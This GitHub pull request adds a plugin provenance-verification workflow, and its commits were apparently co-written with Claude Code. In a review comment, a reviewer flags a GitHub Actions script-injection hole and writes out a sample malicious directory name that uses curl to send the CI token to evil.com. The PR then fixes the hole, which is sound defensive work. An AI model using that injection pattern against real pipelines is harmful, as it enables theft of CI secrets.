Skip to content

feat: Add provenance verification for plugins#9

Merged
kidd0123 merged 5 commits intomainfrom
provenance-check
Apr 2, 2026
Merged

feat: Add provenance verification for plugins#9
kidd0123 merged 5 commits intomainfrom
provenance-check

Conversation

@vijayCarta
Copy link
Copy Markdown
Contributor

@vijayCarta vijayCarta commented Apr 1, 2026

Summary

  • Adds provenance check that runs on PRs touching plugins/**
  • Verifies each changed plugin exists in carta/claude-marketplace main branch
  • Verifies plugin passed security scanning (checks security-manifest.json)
  • Verifies content integrity via SHA-256 hash comparison

Changes Made

  • .github/scripts/verify-provenance.py — Python 3.12 provenance verifier (3 checks: exists, passed, hash match)
  • .github/workflows/provenance-check.yml — Workflow triggered on PRs with plugins/** changes

Dependencies

  • Requires carta/claude-marketplace security scan pipeline to be merged first (generates the manifest this workflow reads)

Test plan

  • Open PR adding a plugin that exists in claude-marketplace → verify provenance passes
  • Open PR adding a plugin NOT in claude-marketplace → verify it fails with clear error
  • Modify plugin content after copying from marketplace → verify hash mismatch is caught

🤖 Generated with Claude Code

@vijayCarta @claude
feat: Add provenance verification for plugins
6bf7406 
Verifies that plugins published to this public repo first exist in the
internal claude-marketplace and have passed security scanning. Checks
existence, security status, and content hash integrity.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
@vijayCarta vijayCarta requested a review from a team as a code owner April 1, 2026 03:59
@github-actions
Copy link
Copy Markdown

github-actions bot commented Apr 1, 2026
edited
Loading

Dependency Review

The following issues were found:
  • ✅ 0 vulnerable package(s)
  • ✅ 0 package(s) with incompatible licenses
  • ✅ 0 package(s) with invalid SPDX license definitions
  • ⚠️ 2 package(s) with unknown licenses.
See the Details below.

Snapshot Warnings

⚠️: No snapshots were found for the head SHA 55201ad.
Ensure that dependencies are being submitted on PR branches and consider enabling retry-on-snapshot-warnings. See the documentation for more information and troubleshooting advice.

License Issues

.github/workflows/provenance-check.yml

PackageVersionLicenseIssue Type
actions/checkout4.*.*NullUnknown License
actions/setup-python5.*.*NullUnknown License

OpenSSF Scorecard

PackageVersionScoreDetails
actions/actions/checkout 4.*.* 🟢 6
Details
CheckScoreReason
Maintained⚠️ 23 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 2
Code-Review🟢 10all changesets reviewed
Binary-Artifacts🟢 10no binaries found in the repo
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
Token-Permissions⚠️ 0detected GitHub workflow tokens with excessive permissions
Packaging⚠️ -1packaging workflow not detected
License🟢 10license file detected
Fuzzing⚠️ 0project is not fuzzed
Signed-Releases⚠️ -1no releases found
Pinned-Dependencies🟢 3dependency not pinned by hash detected -- score normalized to 3
Security-Policy🟢 9security policy file detected
Branch-Protection🟢 6branch protection is not maximal on development and all release branches
SAST🟢 8SAST tool detected but not run on all commits
actions/actions/setup-python 5.*.* 🟢 5.2
Details
CheckScoreReason
Maintained⚠️ 23 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 2
Code-Review🟢 10all changesets reviewed
Binary-Artifacts🟢 10no binaries found in the repo
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
Packaging⚠️ -1packaging workflow not detected
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Token-Permissions⚠️ 0detected GitHub workflow tokens with excessive permissions
Pinned-Dependencies⚠️ 0dependency not pinned by hash detected -- score normalized to 0
License🟢 10license file detected
Fuzzing⚠️ 0project is not fuzzed
Signed-Releases⚠️ -1no releases found
Security-Policy🟢 9security policy file detected
Branch-Protection⚠️ 0branch protection not enabled on development/release branches
SAST🟢 9SAST tool is not run on all commits -- score normalized to 9

Scanned Files

  • .github/workflows/provenance-check.yml

vijayCarta and others added 3 commits April 1, 2026 10:44
@vijayCarta @claude
fix: Align _should_exclude with marketplace generator
3001594 
Match the exact exclusion logic from generate-security-manifest.py:
- Use HASH_EXCLUDE_DIRS for directory-level exclusions only
- Check .pyc via suffix, .DS_Store via file name (not as path parts)

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
@vijayCarta @claude
fix: Use repository variable for internal repo name
a767f06 
Move internal marketplace repo reference to a GitHub Actions
repository variable (PROVENANCE_REPO) instead of hardcoding it.
Reduces information disclosure per security review.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
@vijayCarta @claude
chore: Add Apache 2.0 license
ac79e54 
Aligns with Anthropic's enterprise plugin pattern (knowledge-work-plugins)
and Carta's existing Apache 2.0 repos. Addresses security review item #5.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
kidd0123
kidd0123 reviewed Apr 2, 2026
View reviewed changes
.github/workflows/provenance-check.yml Outdated
python-version: '3.12'
- name: Verify provenance
if: steps.changes.outputs.changed_plugins != ''
run: python .github/scripts/verify-provenance.py "${{ steps.changes.outputs.changed_plugins }}"
Copy link
Copy Markdown
Contributor

@kidd0123 kidd0123 Apr 2, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@claude There's a GitHub Actions script injection vulnerability on line 34 of .github/workflows/provenance-check.yml. The ${{ steps.changes.outputs.changed_plugins }} expression is interpolated directly into a run: shell command, which means
an attacker could create a PR with a malicious directory name like plugins/$(curl evil.com?t=$GH_TOKEN)/foo.txt and get arbitrary code execution in CI.

Fix — change the "Verify provenance" step from:
run: python .github/scripts/verify-provenance.py "${{ steps.changes.outputs.changed_plugins }}"
env:
GH_TOKEN: ${{ github.token }}
PROVENANCE_REPO: ${{ vars.PROVENANCE_REPO }}
to:
run: python .github/scripts/verify-provenance.py "$CHANGED_PLUGINS"
env:
GH_TOKEN: ${{ github.token }}
PROVENANCE_REPO: ${{ vars.PROVENANCE_REPO }}
CHANGED_PLUGINS: ${{ steps.changes.outputs.changed_plugins }}

Passing the value through env: instead of ${{ }} in run: prevents shell interpretation of special characters.

@vijayCarta @claude
fix: Prevent script injection in provenance check
55201ad 
Pass changed_plugins through env var instead of direct ${{ }}
interpolation in run: block to prevent shell injection via
malicious directory names.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
@kidd0123 kidd0123 merged commit 8b952b8 into main Apr 2, 2026
2 checks passed
@kidd0123 kidd0123 deleted the provenance-check branch April 2, 2026 19:16
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@saada saada saada approved these changes

@kidd0123 kidd0123 kidd0123 approved these changes

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@vijayCarta @saada @kidd0123